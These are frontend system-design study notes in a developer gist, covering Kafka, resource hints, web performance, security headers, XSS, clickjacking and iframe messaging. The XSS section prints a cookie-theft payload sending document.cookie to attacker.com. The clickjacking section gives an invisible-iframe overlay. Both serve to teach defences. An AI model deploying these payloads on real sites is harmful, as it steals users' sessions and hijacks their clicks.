FE System Design

yogain123 commented Aug 5, 2024

Tiers of software architecture

  1. Single-Tier (Monolithic) Architecture:

    • Everything is in one place: user interface, business logic, and data storage.
    • The entire application runs on a single machine.
    • Database: Typically embedded within the application (e.g., using SQLite).
    • Example: A standalone desktop application that stores all its data locally.
  2. Two-Tier Architecture:

    • Divides the system into two parts: client and server.
    • Client Tier: Handles user interface and some business logic.
    • Server Tier: The application logic and database often run on the same server. Even when they run on separate machines, together they are still considered a single tier.
    • Database: Runs on the server, separate from the client.
    • Example: A desktop application connecting to a remote database server.
  3. Three-Tier Architecture:

    • Separates the application into three distinct layers.
    • Presentation Tier: User interface (e.g., web browser, mobile app).
    • Application Tier: Business logic and processing.
    • Data Tier: Database and data storage.
    • Each tier typically runs on its own server or set of servers.
    • Example: Most modern web applications.


yogain123 commented Aug 5, 2024

HLD - Photo Sharing app - Instagram

The Content-Disposition header is an HTTP response header used to indicate if the content should be displayed inline in the browser or treated as an attachment to be downloaded.

Common Syntax:

Content-Disposition: inline
Content-Disposition: attachment; filename="example.txt"

Key Parameters:

  1. inline: The content is displayed in the browser.
  2. attachment: The content is downloaded, often with a suggested filename (filename="example.txt").

Example Use:

  • To force a file download with a specific name:
Content-Disposition: attachment; filename="report.pdf"

This prompts the browser to download the file as "report.pdf".
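
As a rough sketch of how a server might set this header (assuming an Express backend and a local reports/ folder, both illustrative):

const express = require("express");
const path = require("path");
const app = express();

app.get("/download/report", (req, res) => {
  // Force the browser to download the file as "report.pdf" instead of rendering it inline
  res.setHeader("Content-Disposition", 'attachment; filename="report.pdf"');
  res.setHeader("Content-Type", "application/pdf");
  res.sendFile(path.join(__dirname, "reports", "report.pdf")); // hypothetical file location
});

app.listen(3000, () => console.log("Server running on http://localhost:3000"));

Express also offers res.download(), which sets Content-Disposition: attachment for you.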


yogain123 commented Aug 5, 2024

KAFKA

What is Kafka?

Apache Kafka is a distributed streaming platform designed to handle real-time data feeds with high throughput and fault tolerance. It is widely used for building real-time data pipelines and streaming applications.


How Kafka Works

  1. Topics: Data is organized into topics, which are similar to tables in a database.
  2. Producers: Producers send messages to Kafka topics.
  3. Consumers: Consumers subscribe to topics and process the messages.
  4. Brokers: Kafka clusters consist of brokers that manage message storage and distribution.
  5. Partitions: Topics are divided into partitions for scalability and parallel processing.

ZooKeeper is another component: it manages and coordinates the brokers (cluster membership, leader election), much like Kubernetes manages containers/pods.


Example Use Cases in Large-Scale Applications

  1. Log Aggregation: Collect logs from different services for centralized storage and analysis.
  2. Real-Time Analytics: Stream real-time user activity data for analytics.
  3. Data Integration: Bridge data between different systems like databases, microservices, or cloud platforms.
  4. Event Sourcing: Capture every state change in applications like e-commerce or finance systems.

JavaScript Example with KafkaJS

KafkaJS is a popular library for integrating Kafka with JavaScript. Below is an example of a simple Kafka producer and consumer.

Step 1: Install KafkaJS

npm install kafkajs

Step 2: Kafka Producer

const { Kafka } = require('kafkajs');

const kafka = new Kafka({
  clientId: 'my-app',
  brokers: ['localhost:9092']
});

const producer = kafka.producer();

const produceMessages = async () => {
  await producer.connect();
  for (let i = 0; i < 10; i++) {
    await producer.send({
      topic: 'test-topic',
      messages: [{ key: `key-${i}`, value: `message-${i}` }]
    });
    console.log(`Message ${i} sent!`);
  }
  await producer.disconnect();
};

produceMessages().catch(console.error);

Step 3: Kafka Consumer

const { Kafka } = require('kafkajs');

const kafka = new Kafka({
  clientId: 'my-app',
  brokers: ['localhost:9092']
});

const consumer = kafka.consumer({ groupId: 'test-group' });

const consumeMessages = async () => {
  await consumer.connect();
  await consumer.subscribe({ topic: 'test-topic', fromBeginning: true });

  await consumer.run({
    eachMessage: async ({ topic, partition, message }) => {
      console.log({
        topic,
        partition,
        key: message.key.toString(),
        value: message.value.toString()
      });
    }
  });
};

consumeMessages().catch(console.error);

How It Works

  1. The producer sends 10 messages to the test-topic.
  2. The consumer subscribes to test-topic and processes incoming messages.

Real-World Example in an Enterprise Application

Use Case: Real-Time Order Processing

  1. Producer: Microservices (e.g., e-commerce) publish order events to the orders topic.
  2. Consumer: A payment service consumes events from orders and processes payments.
  3. Stream Processing: Use Kafka Streams to aggregate and analyze order data for insights.

Note:

  • Database throughput is generally lower.
  • Kafka throughput is high.

Throughput here means OPS (operations per second): if you push too many operations per second at a database, it can slow down or crash, whereas Kafka is designed to absorb that kind of load.


Redis is an in-memory data store (similar to Memcached) -> Redis keeps all data in RAM, making read and write operations extremely fast.
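
A minimal sketch of using Redis as a read cache in front of a slower database (assuming the node-redis client and a local Redis instance; fetchUserFromDb is a stand-in for a real query):

const { createClient } = require("redis");

const redis = createClient({ url: "redis://localhost:6379" });

// Stand-in for a slow database query
const fetchUserFromDb = async (id) => ({ id, name: "Alice" });

async function getUser(id) {
  const cached = await redis.get(`user:${id}`); // served from RAM, typically sub-millisecond
  if (cached) return JSON.parse(cached);

  const user = await fetchUserFromDb(id); // slow path: hit the database
  await redis.set(`user:${id}`, JSON.stringify(user), { EX: 60 }); // cache for 60 seconds
  return user;
}

async function main() {
  await redis.connect();
  console.log(await getUser("42"));
  await redis.quit();
}

main().catch(console.error);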


yogain123 commented Aug 6, 2024

Google crawler

Let me explain how Google's web search and indexing process works in a simple way:

  1. Constant Crawling:
    Google doesn't wait for you to search something to start crawling websites. Instead, it has programs called "web crawlers" or "spiders" that are constantly exploring the internet, 24/7.

  2. Indexing Process:
    As these crawlers visit websites, they read the content and store information about what they find in a huge database. This process is called indexing. It's like creating a massive library catalog of the internet.

  3. Regular Updates:
    Google's crawlers revisit websites periodically to check for changes or new content. How often they do this depends on various factors, like how frequently a site updates its content.

  4. When You Search:
    When you type a search query, Google doesn't start crawling the web at that moment. Instead, it quickly looks through its existing index (the catalog it has already created) to find the most relevant results.

  5. Real-time Indexing:
    For some very popular or frequently updated websites, Google may index changes almost instantly. But this is not the norm for most websites.

  6. Crawling Schedule:
    Google decides how often to crawl each website based on factors like:

    • How often the site's content changes
    • The site's importance or popularity
    • How many other sites link to it
  7. Crawl Budget:
    Google allocates a "crawl budget" to each website, which determines how much time and resources it spends crawling that site.

In summary, Google's indexing is an ongoing process that happens independently of your searches. When you search, you're essentially querying Google's existing index, which is constantly being updated in the background.


HLD - E-commerce App (Amazon, Flipkart)



yogain123 commented Aug 7, 2024

The lang attribute in the HTML tag is used to specify the primary language of the document's content. It's an important attribute for accessibility, search engine optimization, and proper rendering of content.

Here's a brief overview:

  1. Usage: It's typically placed in the opening <html> tag.

  2. Format: It uses a language code, often followed by a country code.

  3. Example:

<html lang="en-US">

This indicates that the document is in English as used in the United States.

  4. Benefits:

    • Helps screen readers pronounce content correctly
    • Assists search engines in indexing and serving content
    • Enables browsers to display language-specific quotation marks or other typographic features
  5. Common language codes:

    • "en" for English
    • "es" for Spanish
    • "fr" for French
    • "de" for German
    • "zh" for Chinese


yogain123 commented Aug 7, 2024

To improve Performance


HSTS stands for HTTP Strict Transport Security.
When a domain is on the HSTS preload list, browsers will always use HTTPS to connect to it, even for the very first request.

For example, when you hit http://flipkart.com, the first request is sent to https://flipkart.com rather than http://flipkart.com, avoiding a redirect round trip and improving performance.
This only works for domains that have added themselves to the preload list. For a domain that is not preloaded, the first request still goes out over http://, and the server responds with a redirect status code (e.g., 301/302) and a Location header pointing to the https:// URL.

Resource Hinting (Early Hints)


These are the different resource hint techniques used in web development to optimize page loading and performance. Let me break down each technique:

  1. Preconnect:

    • Purpose: Connect to a specific cross-origin server in advance
    • Example: <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    • This establishes an early connection to the specified server, reducing latency for subsequent requests.
  2. DNS-prefetch:

    • Purpose: Perform DNS lookup in advance
    • Example: <link rel="dns-prefetch" href="https://fonts.gstatic.com">
    • This resolves the domain name to an IP address ahead of time, speeding up future requests.
  3. Preload:

    • Purpose: Initiate early request to a resource needed for rendering the page
    • Example: <link rel="preload" href="/font.woff2" as="font" crossorigin>
    • This tells the browser to load the specified resource as soon as possible, as it will be needed soon.
  4. Prefetch:

    • Purpose: Load resources which may be needed in the near future, with low priority
    • Example: <link rel="prefetch" href="/next-page.css" as="style">
    • This is used for resources that might be needed for future navigation, loaded with low priority.
  5. Prerender:

    • Purpose: Load an entire page and all its dependencies in the background (hidden from view)
    • Example: <link rel="prerender" href="blog.html">
    • This prepares a complete page in the background, making it instantly available if the user navigates to it.

These techniques are collectively referred to as resource hints. They allow developers to guide the browser in optimizing the loading process, potentially improving page load times and user experience.


Early Hints
Early Hints (HTTP status 103) is a technique where the server sends preliminary headers before the main response. It's used to inform the browser about critical resources early, allowing it to begin loading them sooner.

Key points:

  1. Sent in response headers
  2. Uses HTTP status code 103
  3. Contains Link headers for resource hints (like preload, preconnect)
  4. Followed by the main response (e.g., 200 OK)
  5. Aims to improve perceived page load times

Example:

HTTP/1.1 103 Early Hints
Link: </style.css>; rel=preload; as=style

HTTP/1.1 200 OK
[Main response follows]

Early Hints are indeed sent in the response headers, specifically as an initial response before the full content response.


yogain123 commented Aug 7, 2024

What Are Early Hints?


When a client (e.g., a browser) sends a request to a server, the server may take some time to process the request and generate the full response. With the 103 Early Hints status code, the server can send a preliminary response with hints about resources that the browser should preload or preconnect to while the main response is being prepared.

This allows the browser to:

  • Fetch CSS, JavaScript, images, or fonts earlier.
  • Establish connections (e.g., DNS lookups, TCP handshakes, and TLS negotiations) to required resources.

How It Works

  1. Client Request:

    GET /index.html HTTP/1.1
    Host: example.com
  2. Server Response (Early Hints):

    HTTP/1.1 103 Early Hints
    Link: </style.css>; rel=preload; as=style
    Link: </script.js>; rel=preload; as=script
  3. Final Response:

    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Length: 1234
    
    <html>
    <head>
      <link rel="stylesheet" href="/style.css">
      <script src="/script.js"></script>
    </head>
    <body>
      ...
    </body>
    </html>

Key Points:

  1. Status Code: 103 Early Hints indicates that the server is sending early hints to the client.
  2. Link Header: Used to specify resources that should be preloaded or preconnected.
    • rel=preload: Tells the browser to fetch the resource.
    • as=style/script/image: Specifies the type of resource being preloaded.

Example in Action:

For a webpage with large CSS and JavaScript files, early hints can significantly speed up page rendering:

Without Early Hints:

  1. Browser waits for the server's full response.
  2. Only after receiving the HTML, the browser parses it, discovers <link> and <script>, and begins fetching the resources.

With Early Hints:

  1. Browser starts preloading style.css and script.js immediately upon receiving the 103 Early Hints.
  2. By the time the full HTML arrives, the browser may have already fetched and processed some of the resources.

Benefits:

  1. Reduced Load Time: Preloading critical resources accelerates page rendering.
  2. Efficient Resource Usage: Reduces idle time during server processing.
  3. Improved User Experience: Faster loading creates a smoother experience.

Use Cases:

  • Modern web applications leveraging critical assets (CSS, JS, or fonts).
  • Websites with a server-side rendering process that takes noticeable time.

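
A minimal sketch of sending 103 Early Hints from Node.js (this assumes Node 18.11+, where response.writeEarlyHints is available; the asset paths are illustrative):

const http = require("http");

const server = http.createServer((req, res) => {
  // Send 103 Early Hints so the browser can start preloading while the page is prepared
  res.writeEarlyHints({
    link: [
      "</style.css>; rel=preload; as=style",
      "</script.js>; rel=preload; as=script",
    ],
  });

  // ...slow server-side work happens here, then the final response is sent
  res.writeHead(200, { "Content-Type": "text/html" });
  res.end('<html><head><link rel="stylesheet" href="/style.css"><script src="/script.js"></script></head><body>Hello</body></html>');
});

server.listen(3000, () => console.log("Listening on http://localhost:3000"));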


yogain123 commented Aug 11, 2024

Rendering Patterns



yogain123 commented Jan 14, 2025

Optimize Webpage for Performance

To optimize a website's frontend, focus on these key areas:

  1. Performance Optimization:

    • Minify and bundle CSS, JS, and HTML.
    • Enable Gzip or Brotli compression to reduce file sizes.
    • Use a CDN to deliver static assets faster.
  2. Image Optimization:

    • Use modern formats like WebP.
    • Compress images and serve responsive images with srcset.
    • Lazy load images and videos using loading="lazy".
    • <img src="https://example.com/image.jpg" alt="Example Image" width="600" height="400" loading="lazy">
  3. Script Management:

    • Use async or defer for non-critical JavaScript to prevent render-blocking.
    • Implement code splitting to load only required resources (see the sketch after this list).
  4. Caching:

    • Leverage browser caching and use long expiration headers for static files.
    • Use versioned file names for cache invalidation.
    • Service Workers: Cache key assets and enable offline functionality with Progressive Web Apps (PWA).
  5. Rendering & DOM Optimization:

    • Reduce DOM complexity and remove unused CSS/JS.
    • Minimize layout thrashing and batch DOM updates.
  6. Accessibility & SEO:

    • Use semantic HTML, ARIA roles, responsive design, and proper metadata.
  7. Monitoring & Analysis:

    • Use tools like Lighthouse, WebPageTest, and Chrome DevTools for performance insights.
  Other useful techniques:

  • Virtualization (render only the visible part of long lists)
  • Shimmer/skeleton loading
  • ETag-based revalidation
  • Caching
  • Optimistic updates
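
A minimal sketch of the code splitting mentioned in point 3, using React.lazy and Suspense (the Settings component is illustrative):

import React, { lazy, Suspense } from "react";

// The Settings bundle is downloaded only when the component is actually rendered
const Settings = lazy(() => import("./Settings"));

function App() {
  return (
    <Suspense fallback={<p>Loading...</p>}>
      <Settings />
    </Suspense>
  );
}

export default App;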

Optimizing images

What is a WebP Image?

WebP is a modern image format developed by Google that provides both lossy and lossless compression at smaller file sizes than JPEG or PNG.

Key benefits:

1. Smaller File Sizes
2. Faster Page Load Speeds
3. SEO and Core Web Vitals

  • Google recommends using WebP for better performance, which can improve search rankings.

How to Use WebP for Optimization?

  1. Convert Images to WebP

  2. Serve WebP with Fallbacks

    <picture>
        <source srcset="image.webp" type="image/webp">
        <img src="image.jpg" alt="Fallback image">
    </picture>
    • This ensures compatibility with browsers that don’t support WebP.
  3. Enable WebP via a CDN

    • Services like Cloudflare, Imgix, and Cloudinary automatically convert images to WebP.
  4. Use WebP in CSS

    .background {
        background-image: url('image.webp');
    }

WebP Browser Support

Supported: Chrome, Edge, Firefox, Opera, Android, Safari (from macOS 11, iOS 14).
Not Supported: Older versions of Internet Explorer.

Conclusion

WebP is a game-changer for web performance optimization, reducing image sizes while maintaining quality. Implementing WebP can improve site speed, user experience, and SEO, making it a must-have for modern web development. 🚀


yogain123 commented Jan 18, 2025

Security

Security headers are crucial for protecting web applications from various threats. Below is a list of key security headers that frontend developers should consider implementing:


1. Content Security Policy (CSP)

  • Purpose: Prevents Cross-Site Scripting (XSS), data injection attacks, and other code-injection vulnerabilities.
  • Example:
    Content-Security-Policy: default-src 'self'; script-src 'self' https://apis.example.com; style-src 'self' 'unsafe-inline'

2. Strict-Transport-Security (HSTS)

  • Purpose: Enforces HTTPS connections, protecting against protocol downgrade attacks and cookie hijacking.
  • Example:
    Strict-Transport-Security: max-age=31536000; includeSubDomains

3. X-Frame-Options

  • Purpose: Protects against clickjacking by controlling whether your site can be embedded in an iframe.
  • Example:
    X-Frame-Options: DENY

4. Cache-Control

  • Purpose: Controls caching behavior to prevent sensitive data from being stored improperly.
  • Example:
    Cache-Control: no-store, no-cache, must-revalidate
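
As a rough sketch, these headers could be set from an Express middleware (in practice a library such as helmet is often used instead; the CSP value is illustrative):

const express = require("express");
const app = express();

app.use((req, res, next) => {
  res.setHeader(
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self' https://apis.example.com; style-src 'self' 'unsafe-inline'"
  );
  res.setHeader("Strict-Transport-Security", "max-age=31536000; includeSubDomains");
  res.setHeader("X-Frame-Options", "DENY");
  res.setHeader("Cache-Control", "no-store, no-cache, must-revalidate");
  next();
});

app.get("/", (req, res) => res.send("Hello, secure world!"));

app.listen(3000);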


yogain123 commented Jan 18, 2025

What is an XSS Attack?

XSS (Cross-Site Scripting) is a security vulnerability where attackers inject malicious scripts into web pages viewed by other users. This script can steal sensitive information (e.g., cookies, session data), manipulate the DOM, or even perform unauthorized actions.


How XSS Happens?

  1. JavaScript:
    An attacker injects a script that runs in the victim's browser.

    // Attacker injects this script via input or URL
    <script>alert('Hacked!');</script>
  2. HTML:
    Malicious content is included in inputs and rendered as part of the page.

    <input value="<script>alert('Hacked!');</script>">

How to Mitigate XSS?

  1. Sanitize Inputs:
    Remove or escape special characters in user input.

    const sanitizeInput = (input) => input.replace(/</g, "&lt;").replace(/>/g, "&gt;");
  2. Use Content Security Policy (CSP):
    Restricts the sources of executable scripts.

    Content-Security-Policy: script-src 'self';
  3. Avoid innerHTML:
    Use safer DOM manipulation methods like textContent.

    // Unsafe
    element.innerHTML = userInput;
    // Safe
    element.textContent = userInput;
  4. Validate and Escape Outputs:
    Ensure all data rendered to the page is safe.

  5. Use Secure Libraries:
    Libraries like React automatically escape inputs to prevent XSS.

By following these steps, you can protect your application from XSS attacks.
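
Expanding on points 1 and 5, a small sketch using the DOMPurify library to sanitize untrusted HTML before inserting it (this assumes the package is installed via npm install dompurify and an element with id "comment" exists):

import DOMPurify from "dompurify";

const userInput = '<img src=x onerror="alert(\'Hacked!\')">';

// DOMPurify strips the onerror handler, leaving only safe markup
document.getElementById("comment").innerHTML = DOMPurify.sanitize(userInput);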

How XSS Can Steal Cookies Using an <img> Tag

Attackers can inject a script that creates an <img> whose src smuggles the cookies out to their server. Here's an example of injected code:

<script>new Image().src = "http://attacker.com/steal?cookie=" + document.cookie;</script>
  • When the browser runs this, it requests the image URL, sending the user’s cookies to the attacker’s server (http://attacker.com/steal) as a query string.
  • document.cookie returns all cookies readable by JavaScript for the domain, including session cookies (unless they are marked HttpOnly).

What is CSP (Content Security Policy)?

CSP (Content Security Policy) is a browser feature that helps mitigate XSS and other injection attacks by defining where scripts, styles, or other resources can be loaded from.

How CSP Works

CSP lets you control:

  • Script sources (script-src)
  • Style sources (style-src)
  • Image sources (img-src)
  • And more...

If a script or resource violates the CSP rules, the browser blocks it.


Commonly Used CSP Directives
Here are the most commonly used Content Security Policy (CSP) directives for website security:

  1. default-src (Default Policy)

    • Defines the default source for all content types if no specific directive is set.
    • Example:
      Content-Security-Policy: default-src 'self'
      • Allows loading content only from the same origin.
  2. script-src (JavaScript Security)

    • Controls allowed sources for JavaScript.
    • Example:
      Content-Security-Policy: script-src 'self' https://apis.example.com
      • Allows scripts only from the same origin and https://apis.example.com.
  3. style-src (CSS Security)

    • Defines allowed sources for styles.
    • Example:
      Content-Security-Policy: style-src 'self' 'unsafe-inline'
      • Allows styles from the same origin and inline styles (not recommended but commonly used).
  4. img-src (Image Control)

    • Specifies allowed sources for images.
    • Example:
      Content-Security-Policy: img-src 'self' data:
      • Allows images from the same origin and base64-encoded images.
  5. font-src (Font Security)

    • Defines allowed sources for web fonts.
    • Example:
      Content-Security-Policy: font-src 'self' https://fonts.gstatic.com
      • Allows fonts from the same origin and Google Fonts.
  6. frame-src (iFrame Security)

    • Specifies allowed sources for embedding in <iframe>.
    • Example:
      Content-Security-Policy: frame-src 'none'
      • Blocks embedding of the site in any iframe (prevents clickjacking).

These directives are fundamental in defining a robust CSP to enhance your website's security.
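
Putting it together, a site often combines several directives into one policy. A sketch (domains are illustrative) sent as a response header, or, with some limitations, via a meta tag:

Content-Security-Policy: default-src 'self'; script-src 'self' https://apis.example.com; style-src 'self'; img-src 'self' data:; font-src 'self' https://fonts.gstatic.com; frame-src 'none'

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src 'self' data:">

Note that some directives (such as frame-ancestors) are only honored when the policy is delivered as an HTTP header, not via a meta tag.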


yogain123 commented Jan 18, 2025

What is an Iframe Attack?

1. What Is an Iframe and How Is It Used?

  • Iframes in a Nutshell:
    An iframe is an HTML element (<iframe>) that lets you embed another webpage within your page. For example, you might embed a YouTube video or a Google Map on your site using an iframe.

  • Legitimate Use:
    Iframes are perfectly fine for showing external content. But they can be abused if not properly secured.

2. What Is a Clickjacking Attack?

  • Clickjacking Defined:
    Clickjacking is when an attacker tricks a user into clicking on something different from what they perceive. Essentially, they “hijack” your clicks.

  • How It Works With Iframes:
    An attacker can load your website (or a sensitive part of it) into an iframe on their own malicious webpage. They might then overlay that iframe with transparent elements or misleading buttons.

3. How Could This Happen to Your Website?

Imagine you have a website with a critical button (say, to approve a payment or change settings). Here’s how an attacker might use an iframe to attack it:

  • Embedding Your Site:
    The attacker creates a webpage that includes an invisible iframe of your website. For example:

    <!-- A visible button on the attacker's page -->
    <button>Click here for a free prize!</button>
    
    <!-- An invisible iframe covering the page -->
    <iframe src="https://your-website.com/critical-action" 
            style="opacity:0; position:absolute; top:0; left:0; width:100%; height:100%;">
    </iframe>
  • User Interaction:
    The user sees a nice button and clicks it, thinking they are claiming a prize. However, because the invisible iframe is on top, the click is actually sent to your website’s sensitive action. The user unknowingly triggers the action on your site.

4. How Can Attackers Do This?

  • Misleading the User:
    They design a webpage that appears harmless or enticing.

  • Overlaying Elements:
    They use CSS (like opacity:0, absolute positioning, etc.) to place an iframe containing your site’s content over something else. The user sees only what the attacker wants them to see, while the real clickable area is hidden.

  • Exploiting Trust:
    Since your website might be trusted by the user (they might be logged in or have certain privileges), clicking on hidden elements can lead to unintended actions like making purchases, changing settings, or even more dangerous actions if your site allows sensitive operations.

5. How to Prevent Iframe (Clickjacking) Attacks

To protect your website from being embedded in an attacker’s iframe, you can use several measures:

  • X-Frame-Options HTTP Header:
    This header tells browsers whether your site can be embedded in an iframe. For example:

    • DENY – Your site cannot be embedded anywhere.
    • SAMEORIGIN – Your site can only be embedded in pages from the same domain.

    Example (for Apache):

    Header set X-Frame-Options "DENY"
  • Content Security Policy (CSP):
    Use the frame-ancestors directive to specify which domains are allowed to embed your site.

    Example:

    Content-Security-Policy: frame-ancestors 'self' https://trusted-site.com;
  • Sandbox Attribute for Iframes:
    If you do need to use iframes to embed content, add the sandbox attribute to limit what the embedded content can do.

    Example:

    <iframe src="https://example.com" sandbox="allow-scripts allow-forms"></iframe>

sandbox - If you’re embedding third-party or untrusted content, sandboxing ensures that even if that content is compromised, it can’t harm your website or users.

Hackers don’t “want to use” the sandbox attribute because it works against their goals. They typically look for vulnerabilities in sites that don’t restrict iframe behavior. By not using sandboxing (or similar security measures like X-Frame-Options or Content Security Policy), a website might allow its content to be embedded and manipulated in ways that facilitate attacks (for example, clickjacking).

An iframe is an HTML element that embeds another HTML document within your current document. When you add an iframe, the browser creates a new, nested browsing context with its own window and document objects that are separate from the parent page. This means that—if allowed by same‑origin rules—the iframe’s content runs in its own “mini‑browser” environment.

Below is an explanation along with code examples to illustrate how iframes work and how you can access their window object:


1. How Iframes Work

An iframe (inline frame) is an HTML element that embeds another HTML document within your current document. When an iframe is added:

  • The browser creates a nested browsing context (a separate window and document).
  • It can load content from an external URL (via the src attribute) or inline HTML (using the srcdoc attribute).

Basic Example

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Parent Document</title>
  </head>
  <body>
    <h1>Parent Document</h1>
    <iframe id="myIframe" src="iframe-content.html" width="400" height="200" style="border:1px solid #ccc;"></iframe>
  </body>
</html>

And the embedded document (iframe-content.html):

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Iframe Content</title>
    <script>
      // A function in the iframe that could be called from the parent if same-origin
      function someFunction() {
        console.log("Function inside iframe called!");
      }
    </script>
  </head>
  <body>
    <h2>This is the iframe content</h2>
    <p>The iframe runs in its own window.</p>
  </body>
</html>

Key Point:
If both the parent and iframe are from the same origin (same protocol, domain, and port), the parent can access the iframe’s contentWindow and contentDocument. If they differ (cross‑origin), direct access is blocked by the browser’s same-origin policy.

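A small sketch of that same-origin access, building on the example above (it assumes the parent page and iframe-content.html are served from the same origin):

<script>
  // Runs in the parent document from the earlier example
  const frame = document.getElementById("myIframe");

  frame.addEventListener("load", () => {
    // Same-origin: the parent can reach into the iframe's document and window
    const heading = frame.contentDocument.querySelector("h2");
    console.log("Iframe heading:", heading.textContent);

    frame.contentWindow.someFunction(); // calls the function defined inside the iframe
  });
</script>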

2. Iframe Security and Vulnerabilities

Clickjacking and Iframe Attacks

  • Clickjacking:
    An attacker might overlay a transparent iframe over a visible button so that when a user clicks what they see, the click actually interacts with the hidden iframe. This can trick users into performing unintended actions.

  • Mitigation Techniques:
    Use HTTP headers such as X-Frame-Options (with values like DENY or SAMEORIGIN) or a Content Security Policy (CSP) with the frame-ancestors directive to prevent your site from being embedded in unauthorized iframes.


3. Advanced Iframe Features

A. The srcdoc Attribute

The HTML5 srcdoc attribute allows you to embed HTML content directly into an iframe. Instead of loading a document from a URL, you supply the HTML code as a string.

Example

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Using srcdoc</title>
  </head>
  <body>
    <h1>Parent Document</h1>
    <iframe
      srcdoc="
        <!DOCTYPE html>
        <html>
          <head>
            <meta charset='UTF-8'>
            <title>Iframe via srcdoc</title>
            <style>
              body { background-color: #f0f0f0; font-family: sans-serif; }
            </style>
          </head>
          <body>
            <h2>Hello from srcdoc!</h2>
            <p>This content is embedded directly.</p>
          </body>
        </html>"
      width="400"
      height="200"
      style="border: 1px solid #ccc;">
    </iframe>
  </body>
</html>

Benefit:
No extra HTTP request is needed because the iframe content is defined inline.


B. Cross-Window Communication with postMessage

When the iframe and its parent are either from different origins or when direct DOM access is not allowed, the postMessage API lets them securely exchange messages.

How It Works

  • Sender:
    Calls targetWindow.postMessage(message, targetOrigin).

    • message can be a string or structured object.
    • targetOrigin should be set to the expected origin for security (using "*" is discouraged).
  • Receiver:
    Sets up an event listener for the message event and checks event.origin to verify the sender.

Example: Parent-to-Child Communication

Parent Page (e.g., https://parent.example.com/):

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Parent Document</title>
  </head>
  <body>
    <h1>Parent Document</h1>
    <iframe id="childFrame" src="https://child.example.com/child.html" width="400" height="200" style="border:1px solid #ccc;"></iframe>
    <button id="sendBtn">Send Message to Iframe</button>

    <script>
      const iframe = document.getElementById('childFrame');

      iframe.addEventListener('load', () => {
        // Send message to the child iframe; specify its exact origin for security.
        iframe.contentWindow.postMessage('Hello from Parent!', 'https://child.example.com');
      });

      window.addEventListener('message', (event) => {
        if (event.origin !== 'https://child.example.com') {
          console.warn('Origin mismatch:', event.origin);
          return;
        }
        console.log('Parent received:', event.data);
      });
    </script>
  </body>
</html>

Child Page (child.html, served from https://child.example.com/):

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Child Iframe</title>
  </head>
  <body>
    <h2>Child Document</h2>
    <button id="replyBtn">Reply to Parent</button>
    <script>
      window.addEventListener('message', (event) => {
        if (event.origin !== 'https://parent.example.com') {
          console.warn('Origin mismatch:', event.origin);
          return;
        }
        console.log('Child received:', event.data);
      });

      document.getElementById('replyBtn').addEventListener('click', () => {
        window.parent.postMessage('Hello from Child!', 'https://parent.example.com');
      });
    </script>
  </body>
</html>

Key Points:

  • Even when the documents are from different origins, they can exchange messages using postMessage.
  • Always validate the event.origin on the receiving end for security.

C. The sandbox Attribute

The sandbox attribute adds extra restrictions to the content of an iframe to enhance security. By default, when sandbox is applied (without additional tokens), it:

  • Treats the content as being from a unique origin (even if it normally wouldn’t be).
  • Disables script execution.
  • Blocks form submission.
  • Prevents the content from navigating the top-level window, among other restrictions.

Relaxing Sandbox Restrictions

You can selectively relax these restrictions by adding tokens such as:

  • allow-scripts — to permit scripts to run.
  • allow-same-origin — to treat the iframe content as if it were from the same origin (enabling direct DOM access from the parent).
  • allow-forms — to allow form submissions.
  • allow-popups — to permit popups.

4. Access Between Iframe and Parent

  • Accessing the Parent:
    In a same‑origin situation, code inside the iframe can refer to the parent window using window.parent. For example:

    <script>
      // Inside the iframe
      console.log("Parent title:", window.parent.document.title);
    </script>
  • Restrictions with Cross-Origin:
    If the iframe is from a different origin, direct access (like reading window.parent.document) is blocked by the browser’s same-origin policy. In such cases, postMessage is the only secure way to exchange data.


yogain123 commented Jan 23, 2025

How to Approach FE HLD

Approach for Frontend HLD Interview Round:

  1. Start: List functional and non-functional requirements.
  2. Architecture: Present a high-level architecture diagram (focus on client-side: view, controller, service, storage).
  3. Component Architecture
  4. Data Model: Define the data structure.
  5. APIs: Outline the required APIs.
  6. Details: Discuss optimizations, internationalization, SEO or other key requirements as per interviewer focus.

All Non Functional Requirement

1. Performance

  • Ensure fast load times (<3s), low latency (<100ms), optimized assets, and efficient rendering.

2. Scalability

  • Handle increased traffic and allow modular component-based development for future growth.

3. Security

  • Implement secure authentication (OAuth, JWT), protect against XSS/CSRF, and enforce CSP.

4. Accessibility (A11y)

  • Ensure WCAG 2.1 compliance, keyboard navigation, and support for assistive technologies.

5. Cross-Browser Compatibility

  • Test and ensure consistent functionality across all major browsers and versions.

6. Offline Support

  • Use service workers for caching and provide offline functionality with sync capabilities.

7. Responsive Design

  • Support various devices, screen sizes, and orientations with mobile-first design.

8. Localization (i18n)

  • Enable multi-language support, including RTL, and adapt formats for dates and currencies.

9. Usability and UX

  • Provide intuitive navigation, consistent UI, and smooth animations for a great user experience.

10. Rendering Approach

  • Choose CSR, SSR, SSG, or ISR based on performance, SEO, and interactivity needs.

11. Caching

  • Use browser caching, IndexedDB, and CDNs to reduce server load and enhance speed.

12. Testing

  • Perform unit, integration, and end-to-end testing using tools like Jest and Cypress.

13. Availability and Reliability

  • Ensure zero-downtime deployments, graceful error handling, and fallback mechanisms.

14. Logging and Monitoring

  • Track errors and monitor performance using tools like Sentry or LogRocket.

15. SEO and Social Sharing

  • Optimize meta tags, implement SSR/SSG, and ensure proper sitemap and robots.txt.

16. Deployment

  • Use CI/CD for automated builds, cache-busting, and rollback strategies for fault recovery.

Example API response formats (success and error) for a document-fetch API:

{
  "status": "success",
  "message": "Document fetched successfully",
  "data": {
    "documentId": "abc123",
    "title": "Design Doc",
    "content": "<h1>Hello World</h1>",
    "users": [
      { "id": "user1", "name": "Alice", "cursorPosition": 120 },
      { "id": "user2", "name": "Bob", "cursorPosition": 200 }
    ],
    "lastUpdated": "2025-02-06T10:00:00Z"
  },
  "timestamp": "2025-02-06T10:05:00Z"
}
{
  "status": "error",
  "errorCode": "DOCUMENT_NOT_FOUND",
  "message": "The requested document does not exist",
  "details": "Document with ID 'xyz789' was not found in the database",
  "timestamp": "2025-02-06T10:05:00Z"
